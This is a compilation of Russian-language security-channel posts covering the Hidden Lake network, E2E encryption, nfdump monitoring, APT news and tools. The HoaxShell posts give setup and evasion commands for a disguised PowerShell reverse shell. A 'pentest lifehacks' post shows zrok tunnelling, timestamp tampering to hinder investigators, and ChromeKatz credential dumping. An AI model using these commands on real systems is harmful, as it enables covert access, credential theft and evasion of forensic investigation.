Hidden Lake: что это?

👋 Приветствую в мире цифровой безопасности!

Расскажу, как работает Hidden Lake - децентрализованная анонимная сеть нового поколения

⏺Что такое Hidden Lake: Это F2F (friend-to-friend) сеть, которая не зависит от количества узлов, их расположения или связей между ними.
Сеть построена по модели QB-задачи:

➡️Сообщения шифруются ключом получателя: c = Ek(m)
➡️Рассылаются всем участникам сети каждые T секунд
➡️Даже если нет данных — отправляется фейковое сообщение c = Er(v)
➡️Каждый пытается расшифровать всё. Получилось? Значит для вас. Нет? Игнорируем.

⏺Так и в чем особенность: Запуск узла стал реально нативным. Код на Go, сеть работает независимо от структуры, анонимность не требует доверия к третьим сторонам. Хотите сделать свой мессенджер, логгер или просто зашифрованный канал - Hidden Lake теперь позволяет это без боли.

Делаем вторую часть с настройкой?

ZeroDay | #безопасность

Три способа запустить Hidden Lake-узел на Go

👋 Приветствую в мире цифровой безопасности!

Вернемся к запуску узла Hidden Lake.

⏺Всего у нас есть три способа, которыми мы это можем сделать (спойлер: последний самый крутой)

⏺Низкоуровневый путь - go-peer: Самостоятельный запуск узла через go-peer - это вроде и работает неплохо, но настраивать это совсем неприятно... Вам придётся руками инициализировать: хранилище, логгер, сетевой стек, шифрование и кучу всего еще.

node := anonymity.NewNode(
    anonymity.NewSettings(...),
    logger.NewLogger(...),
    func() database.IKVDatabase { ... }(),
    network.NewNode(...),
    queue.NewQBProblemProcessor(...),
    asymmetric.NewMapPubKeys(),
).HandleFunc(...)

connKeeper := connkeeper.NewConnKeeper(...)

⏺Высокоуровневый путь - HLS: Если задача просто юзать сеть, этот способ подойдёт суперски:

$ go install github.com/number571/hidden-lake/cmd/hls@latest
$ hls -network=oi4r9NW9Le7fKF9d

Из коробки HLS подтянет нужные подключения и стартует как полноценный узел. Но встроенные микросервисы и архитектура усложняют кастомизацию.

⏺Средний путь - network.NewHiddenLakeNode: Вот теперь по-настоящему удобно. Новый API позволяет запустить полноценный узел буквально в пару строчек:

node := network.NewHiddenLakeNode(
    network.NewSettingsByNetworkKey(networkKey, nil),
    asymmetric.NewPrivKey(),
    initKV(dbPath),
    getConnections(networkKey),
    echoHandler,
)
go func() { _ = node.Run(ctx) }()

Без кастомного логгера, без QB-конструктора, без лишней боли. Просто:
➡️передаём ключ,
➡️задаём список соединений,
➡️указываем базу и обработчик.

⏺И вот условно вы решили проверить, как два узла работают друг с другом. Запускаем runNode для каждого и реализуем простейшую обработку запроса:

func echoHandler(_ context.Context, _ asymmetric.IPubKey, r request.IRequest) (response.IResponse, error) {
 body := fmt.Sprintf("echo: %s", string(r.GetBody()))
 return response.NewResponse().WithBody([]byte(body)), nil
}

Они обмениваются публичными ключами и шлют друг другу сообщения:

rsp, err := node1.FetchRequest(
 ctx,
 pubKey,
 request.NewRequest().WithBody([]byte("hello, world!")),
)
fmt.Println(string(rsp.GetBody()))

И в результате:

$ go run .
> response:(echo: hello, world!)
> response:(echo: hello, world!)
> response:(echo: hello, world!)

ZeroDay | #hiddenlake

E2E-шифрование

👋 Приветствую в мире цифровой безопасности!

Давай расскажу про end-to-end (E2E) шифрование.

⏺В чем суть: E2E - это когда только отправитель и получатель могут читать сообщение. Даже сервер, через который проходит трафик, видит только шифртекст. Это достигается за счёт криптографии с открытым ключом.

⏺Весь процесс:

1️⃣Обмен ключами: чаще всего через X3DH или похожий протокол. Клиенты обмениваются публичными ключами, не раскрывая приватные.
2️⃣Создание общего секрета: используя Diffie–Hellman, клиенты независимо вычисляют один и тот же ключ шифрования. Он нигде не передаётся.
3️⃣Шифрование: сессионные ключи применяются для симметричного шифрования сообщений. Обычно используется AES-GCM.
4️⃣Forward secrecy: на каждый сеанс генерируется новый ключ. Старая переписка останется в секрете даже при компрометации ключа.

⏺Зачем это всё?
Даже если злоумышленник:
• перехватит трафик,
• получит доступ к серверам,
• подделает сообщения в канале,
он не сможет прочитать содержимое, пока не взломает ключи на клиенте. А это уже история не про перехват, а про доступ к устройству.

⏺Мессенджеры вроде Signal и Session - эталон реализации E2E. В то время как в WhatsApp или Telegram оно работает не везде и не всегда.

ZeroDay | #шифрование

Как найти и потерять бэкдор в ESP32

В марте скромная плата ESP32 внезапно оказалась в центре целого скандала. СМИ писали о «бэкдоре в миллиарде устройств», а юзеры обсуждали захват умных ламп и чайников. Но уже через неделю была тишина. Что же на самом деле нашли испанские исследователи, и был ли это бэкдор?

⏺В статье вся история: от зала конференции в Мадриде до CVE-записи и официального опровержения. Простым языком о низкоуровневом Bluetooth, «золотом бинарнике» и том, как PR в ИБ порой громче самой уязвимости.

ZeroDay | #Статья

Искусственный интеллект — главный защитник против кибермошенников.

Сегодня сфера киберпреступлений является одной из самых опасных угроз, и без использования искусственного интеллекта победить его невозможно. Об этом рассказал зампред правления Сбера Станислав Кузнецов в рамках своего выступления на ПМЮФ.

⏺ Он заявил, что в ближайшие два года Ai-технологии помогут сократить убытки от мошенничества на 70%. Но главная цель — это 80% телефонных мошенников, которых ИИ будет выявлять до того, как пользователь ответит на звонок, к 2026 году.

ZeroDay | #Безопасность

APTRS: автоматизация отчётов пентестера без боли

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺APTRS — автоматизация, которая реально экономит время. Тут вместо ручной сборки отчётов: просто ведёте проект, отмечаете найденные уязвимости, а остальное делает система. Генерация отчётов, дашборд для клиента, шаблоны под ваш стиль - всё уже встроено.

⏺Чем цепляет: по сути, это пентест-CRM с кнопкой “Собрать отчёт”. Загружаете PoC, описания, рекомендации, отмечаете, что пофикшено — и готово. Не нужно копировать текст между документами, править вручную или держать десятки таблиц. Установка — через docker-compose, в демку можно зайти прямо сейчас.

ZeroDay | #Инструмент

👋 Приветствую в мире цифровой безопасности!

Сделал для вас новую подборку крутых подкастов по ИБ и не только. В этот раз они будут англоязычные.

⏺ The 443 – Security Simplified — хакеры и исследователи обсуждают главные новости недели.
⏺ 7 Minute Security — коротко, но по делу. Каждую неделю тут советы, лайфхаки и практики для синих команд и безопасников.
⏺ CISO Series Podcast — инсайды от топов. Как думают директора по безопасности, чем они живут, как выстраивают процессы и балансируют между рисками и бюджетами.
⏺ The Social-Engineer Podcast — глубже про социнженерию: от манипуляций в переговорах до защиты от фишинга. Ведущий - автор книг и практик, которые применяют даже в спецслужбах.
⏺ The NDS Show — OSINT и разведка на основе открытых данных: геолокации, спутниковые снимки, публичные источники.
⏺ Cyber CEOs Decoded — CEO Devo зовёт в гости других директоров из мира ИБ. Истории, провалы, рост — всё, что за кулисами больших компаний.

ZeroDay | #Подборка

Мониторим трафик в Linux с nfdump

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу о легкой настройке мониторинга сетевых соединений в Linux с помощью nfdump и NetFlow

⏺Установка и сбор данных с nfdump: nfdump - удобный тул для сбора и анализа NetFlow/IPFIX данных. Сначала установим и запустим nfdump:

sudo apt install nfdump
sudo systemctl start nfacctd

Затем настроим nfacctd.conf для приёма NetFlow с вашего маршрутизатора или коммутатора. Например:

[collector1]
bind = 0.0.0.0
port = 2055

⏺Анализ и фильтрация потоков: а вот полученные данные можно смотреть через консоль:

nfdump -r /var/log/nfdump/currentfile

Для поиска трафика с подозрительных IP или портов:

nfdump -r /var/log/nfdump/currentfile "dst port 22 or src ip 192.168.1.5"

⏺Экспорт и интеграция с SIEM: nfdump умеет выгружать данные в CSV или JSON, которые уже потом легко можно отправить в вашу SIEM систему для анализа и корреляции:

nfdump -r /var/log/nfdump/currentfile -o csv > flows.csv

Или через cron запускать регулярный экспорт для автоматизации.

ZeroDay | #безопасность

Преступный ИИ уже существует, и он доступен любому

То, что раньше требовало опыта и кучи навыков, теперь умеет делать Xanthorox - это перый полноценный ИИ-преступник. Никаких даркнетов и сложных паролей - всё легко: YouTube, Telegram, Discord и интерфейс как у ChatGPT. Вводите запрос и получаете фишинг, дипфейки или вымогатель.

⏺В статье о том, как от джейлбрейков ChatGPT мы дошли до WormGPT и целой армии преступных ИИ. Расскажут, как школьники запускают тысячи атак, и почему самая большая угроза - это массовое мошенничество, а не ядерные бомбы.

Короче, ИБшникам напрячься 😬

ZeroDay | #Статья

HoaxShell: обратный шелл в маске веб-трафика

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что за инструмент: HoaxShell генерит PowerShell-пейлоады с подстроенными под реальные веб-запросы URL и хитрыми HTTP-заголовками, а шифрование и поддержка HTTPS делают их похожими на обычный браузерный трафик. Если связь прервётся - сессия легко восстановится

⏺Чем крут: не тупо обратный шелл - это такой виртуальный хамелеон в сети. Его сложно заметить и еще сложнее заблокировать, а настройка очень и очень легкая, а значит позволяет быстро адаптировать его под любую ситуацию.

⏺Как начать: Разворачиваете сервер, генерируете пейлоад с нужными параметрами и запускаете на целевой машине — и всё, связь установлена и маскирована под обычный веб-трафик.

ZeroDay | #Инструмент

Настроим PowerShell через HTTP с помощью Hoaxshell

👋 Приветствую в мире цифровой безопасности!

А теперь разберем, как работать с инструментом из прошлого поста

⏺Установка: Ставится легко — обычный git и pip:

git clone https://github.com/t3l3machus/hoaxshell  
cd ./hoaxshell  
sudo pip3 install -r requirements.txt  
chmod +x hoaxshell.py  

⏺Базовое подключение: Запускаем сервер на вашей машине:

sudo python3 hoaxshell.py -s <your_ip>

Сгенерируется PowerShell-пейлоад, готовый к запуску на машине.

⏺Хотите меньше палиться: Подставляем стандартный HTTP-заголовок, чтобы не ловиться на сигнатуры:

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

Можно ещё подгрузить свой .ps1:

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

А если потеряли сессию - восстанавливаем:

sudo python3 hoaxshell.py -s <your_ip> -g

⏺HTTPS и туннели: Есть поддержка HTTPS с самоподписанным или валидным сертификатом, а ещё - возможность прокинуть через Ngrok или LocalTunnel:

sudo python3 hoaxshell.py -ng  # через Ngrok  
sudo python3 hoaxshell.py -lt  # через LocalTunnel  

⏺И да кстати, интерактивные команды (типа powershell или cmd.exe) могут подвесить сессию. Всё, что нужно - запускать команды напрямую, не открывая консоль внутри консоли. Например:

cmd /c whoami
powershell echo 'Test'

ZeroDay | #Инструмент

Lotus Panda: взломы госструктур ЮВА

👋 Приветствую в мире цифровой безопасности!

Расскажу о APT-группировке Lotus-Panda.

⏺Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.

⏺Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.

⏺Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и datechanger.exe (подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.

⏺Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках про пентесте.

⏺Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.

zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint

⏺datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.

datechanger.exe -modify 01/01/2017 payload.exe

⏺ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.

ChromeKatz.exe -dump

ZeroDay | #пентест

Как мессенджеры шифруют сообщения (end-to-end) на самом деле

То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.

⏺В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.

ZeroDay | #Статья